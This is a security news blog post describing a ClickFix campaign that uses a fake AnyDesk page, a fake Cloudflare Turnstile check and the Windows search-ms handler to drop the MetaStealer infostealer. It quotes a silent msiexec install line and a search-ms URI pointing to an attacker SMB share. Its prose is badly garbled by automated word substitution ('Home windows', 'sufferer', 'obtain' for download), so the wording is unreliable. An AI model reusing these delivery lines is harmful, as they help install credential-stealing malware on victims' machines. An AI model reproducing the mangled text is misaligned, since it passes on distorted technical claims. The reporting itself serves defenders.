Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New ClickFix Attack Mimic as AnyDesk Leverages Windows Search to Drop MetaStealer

Posted on September 2, 2025September 2, 2025 By CWS

A novel variant of the ClickFix assault has lately emerged, masquerading as a reputable AnyDesk installer to unfold the MetaStealer infostealer.

This marketing campaign exploits a pretend Cloudflare Turnstile verification web page to lure victims into executing a crafted Home windows protocol handler, finally delivering a malicious MSI package deal disguised as a PDF.

As organizations proceed to harden their defenses in opposition to conventional social-engineering methods, menace actors are evolving their playbooks, mixing acquainted lures with sudden system elements to bypass detection and steal delicate credentials.

In early August, customers looking for the AnyDesk distant entry instrument encountered a misleading touchdown web page at anydeesk[.]ink/obtain/anydesk.html.

The web page displayed what gave the impression to be a typical Cloudflare Turnstile immediate, full with a “confirm you might be human” button.

The preliminary hyperlink that redirects customers to a pretend Cloudflare Turnstile (Supply – Huntress)

Upon clicking, victims weren’t guided to stick a command into the Run dialog field as in basic ClickFix assaults however as a substitute redirected into Home windows File Explorer by way of the search-ms URI handler.

Huntress researchers famous that this refined shift in redirection mechanism capitalized on the lesser-monitored Home windows Search protocol, catching safety groups off-guard.

Home windows File Explorer Redirection by way of search-ms (Supply – Huntress)

The an infection chain unfolds when the search-ms URI invokes a distant SMB share, delivering a Home windows shortcut file named “Readme Anydesk.pdf.lnk” to the sufferer’s system.

In contrast to FileFix variants that depend on clipboard-pasted PowerShell instructions, this assault robotically launches the LNK payload, which in flip executes a script to obtain and set up two elements: the real AnyDesk installer hosted on Microsoft Edge for plausibility, and a decoy PDF served from chat1[.]retailer.

The decoy file is in truth an MSI package deal that dynamically incorporates the sufferer’s hostname into its obtain URL by leveraging the %COMPUTERNAME% surroundings variable. As soon as downloaded, the MSI is put in by way of:-

msiexec /i “%TEMP%%%COMPUTERNAME%%.msi” /quiet

After this command completes, metadata reveals two major artifacts: a CustomActionDLL answerable for orchestrating the setup and a CAB archive containing ls26.exe, the MetaStealer dropper, and cleanup scripts.

Displayname Parameter Revealing SMB Share (Supply – Huntress)

Huntress analysts recognized that ls26.exe is protected with Non-public EXE Protector and displays attribute behaviors of MetaStealer, together with credential harvesting from browsers and crypto-wallet theft.

An infection Mechanism

On the coronary heart of this marketing campaign lies the ingenious use of Home windows Search. By invoking the search-ms URI protocol, attackers bypass the Run dialog restrictions in hardened environments and introduce payloads immediately by way of File Explorer.

The next URI snippet illustrates the redirection:-

search-ms:displayname=AnyDeskpercent20Securepercent20Access;crumb=location:attacker-smbshare

As soon as the person confirms the File Explorer immediate, the LNK file silently executes the obtain routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js.

The JavaScript file ensures the removing of middleman recordsdata, whereas ls26.exe initiates the info exfiltration part.

By abusing reputable Home windows protocols and file dealing with, this assault evades sandbox detection and safety alerts till the ultimate payload unleashes its malicious logic.

This rising tactic underscores the significance of monitoring unconventional extensions of trusted system options.

Defenders ought to contemplate implementing strict protocol handler insurance policies, SMB auditing, and contextual evaluation of MSI installations to detect and disrupt these subtle social-engineering campaigns.

Increase your SOC and assist your workforce defend your corporation with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:AnyDesk, Attack, ClickFix, Drop, Leverages, MetaStealer, Mimic, Search, Windows

Post navigation

Previous Post: Hackers Stole Customer Data from Salesforce Instances
Next Post: New WhatsApp Scam Alert Tricks Users to Get Complete Access to Your WhatsApp Chats

Related Posts

Anubis Ransomware Attacking Android and Windows Users to Encrypt Files and Steal Login Credentials Cyber Security News
UTG-Q-1000 Group Weaponizing Subsidy Schemes to Exfiltrate Sensitive Data Cyber Security News
ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials Cyber Security News
International Criminal Court Hit by New Sophisticated Cyber Attack Cyber Security News
Threat Actors Using CrossC2 Tool to Expand Cobalt Strike to Operate on Linux and macOS Cyber Security News
Google Warns 2.5B Gmail Users to Reset Passwords Following Salesforce Data Breach Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Hackers Leverage Hexstrike-AI Tool to Exploit Zero Day Vulnerabilities Within 10 Minutes
  • CISA Adds TP-Link and WhatsApp Flaws to KEV Catalog Amid Active Exploitation
  • Salesloft Takes Drift Offline After OAuth Token Theft Hits Hundreds of Organizations
  • Cloudflare Confirms Data Breach, Hackers Stole Customer Data from Salesforce Instances
  • How to Use a Secure File Sharing Platform

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Hackers Leverage Hexstrike-AI Tool to Exploit Zero Day Vulnerabilities Within 10 Minutes
  • CISA Adds TP-Link and WhatsApp Flaws to KEV Catalog Amid Active Exploitation
  • Salesloft Takes Drift Offline After OAuth Token Theft Hits Hundreds of Organizations
  • Cloudflare Confirms Data Breach, Hackers Stole Customer Data from Salesforce Instances
  • How to Use a Secure File Sharing Platform

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News